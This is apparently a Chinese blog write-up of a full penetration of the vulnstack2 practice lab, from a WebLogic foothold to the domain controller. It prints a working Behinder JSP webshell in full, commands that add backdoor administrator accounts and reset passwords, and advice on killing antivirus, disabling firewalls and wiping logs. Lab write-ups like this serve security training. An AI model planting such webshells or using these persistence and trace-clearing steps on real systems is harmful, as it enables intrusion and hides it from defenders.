【红日靶场】vulnstack2-完整渗透过程

---

一、网络拓扑

网络配置：

二、描述

红队实战系列，主要以真实企业环境为实例搭建一系列靶场，通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码：1qaz@WSX

1. Bypass UAC
2. Windows系统NTLM获取（理论知识：Windows认证）
3. Access Token利用（MSSQL利用）
4. WMI利用
5. 网页代理，二层代理，特殊协议代理（DNS，ICMP）
6. 域内信息收集
7. 域漏洞利用：SMB relay，EWS relay，PTT(PTC)，MS14-068，GPP，SPN利用
8. 域凭证收集
9. 后门技术（黄金票据/白银票据/Sid History/MOF）

• 环境说明
  内网网段：10.10.10.1/24
  DMZ网段：192.168.111.1/24
  测试机地址：192.168.111.1（Windows），192.168.111.11（Linux）
  防火墙策略（策略设置过后，测试机只能访问192段地址，模拟公网访问）：

deny all tcp ports：10.10.10.1
allow all tcp ports：10.10.10.0/24
1
2

• 配置信息
  DC
  IP：10.10.10.10OS：Windows 2012(64)
  应用：AD域
  WEB：
  IP1：10.10.10.80 IP2：192.168.111.80OS：Windows 2008(64)
  应用：Weblogic 10.3.6 MSSQL 2008
  PC：
  IP1：10.10.10.111 IP2：192.168.111.201 OS：Windows 7(32)
  攻击机：
  IP：192.168.111.1 OS：Windows 11(64)
  IP：192.168.111.128 OS：kaliLinux(64)

配置环境

web主机登录使用de1ay用户登录密码是1qaz@WSX

这里的网关地址给的1也就是主机的地址所以这里是没外网的如果要外网修改为2就行，这里做内网我就不改了

开启weblogic：C:\Oracle\Middleware\user_projects\domains\base_domain
使用管理员才能进去administrator/1qaz@WSX

再次输入账户和密码启动：


内网网卡是防火墙禁用10网段外网无法访问10段：

渗透开始

信息收集

目标：192.168.111.80是作为web的边界的攻击目标
主要服务：web、sql server和rdp和weblogic还有smb

存在多个漏洞：

开始攻击

直接开打：

执行命令：tasklist /svc

存在杀软：360

尝试上传shell是否会杀：正常先做免杀测试
先获取一下路径：


好像被杀了：换了个工具继续上传

成功了上传冰蝎马：

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
1

/该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond/

成功拿到shell：

寻找一下位置：

注入内存马稳定shell：

信息收集：存在多张网卡

确定是否存在域环境：

上面检测出360得想个办法给他干掉

干掉杀软

一、 3389上去直接关闭，需要创建管理员用户
二、 提权到system关闭
三、 对c2做免杀
创建用户：

net user julien 1qaz@WSX /add
net localgroup Administrators julien /add
1
2

连接是报错：

使用administrator用户登录因为不知道密码直接改密码：

net user Administrator 1qaz@WSX
1

登录

直接卸载

关闭防火墙然后就可以为所欲为了！！

cs上线

上线cs马:
生成马上传运行

抓取明文密码：

mssql也是弱密码还有域内的用户名密码

权限提升

使用ms14-058提权

拿到system权限：

内网探测

cs探测不到

使用fscan试试：
看到10.10.10.10

上线msf：

上传运行：

做socks 4：

kali连接socks

探测到192.168.111.201：

cs的arp探测：

192.168.111.2和128是我的主机和kali省略：smb上线尝试横向

横向移动

使用smb beacon上线：

上线成功：

查看有无杀软：

还有360：

有开3389：抓取密码登录rdp

查看一下administrator的用户：


尝试administrator和mssql登录3389：（失败）

直接探测其他主机：

前面探测到10.10.10.10，这里直接横向尝试：

再次横向移动：

再次横向

拿到权限：

rdp连接

修改Administrator登录3389：

笑死

创建用户继续：


注意这样会有弹窗：
这里是我已经登录了

费劲终于拿到了，去干掉杀软


关闭防火墙：

再去拿10主机：
也开了3389

这里因为10主机在内网，主机不能直接连需要通过socks：
先看有无杀软：

没有：

这里用命令关闭防火墙：

因为我们主机不能直接访问10.10.10.10（其实是可以的但是假装不可以）做一下socks5：

shell工具连接使用代理：

然后抓一下账户和密码：

怎么都是空的没有密码：
直接创建用户并加入组：
net user julien 1qaz@WSX /add
net localgroup administrators julien /add

直接shell工具连接：

代理用上面的：

这里代理好像失败了：

那就直接用kali的rdp

proxychains rdesktop -g 1440x900 -r disk:LinuxDisk=/root/Downloads -u julien -p “1qaz@WSX” 10.10.10.10:3389

kali连接失败：

尝试去cs上面找找问题：
查看端口：

nmap探测一下：

感觉没问题再次尝试连接：
直接用已经拿到的主机进行连接：这里用上面的windows7连接的10域控成功拿到：

成功通过。

痕迹清除

删除多个日志特别是weblogic的日志别忘，用户等创建可以使用隐藏方式创建，创建影子账号后面会用到这里就不展示了，痕迹清除就是原路返回，有很多工具可以用大家自己找吧这里就不放了！

总结：

可以通过多种方式进行渗透测试这里只是我自己喜欢的方式，内网还能抓取hash等利用，在后面的红日靶场系列中会使用。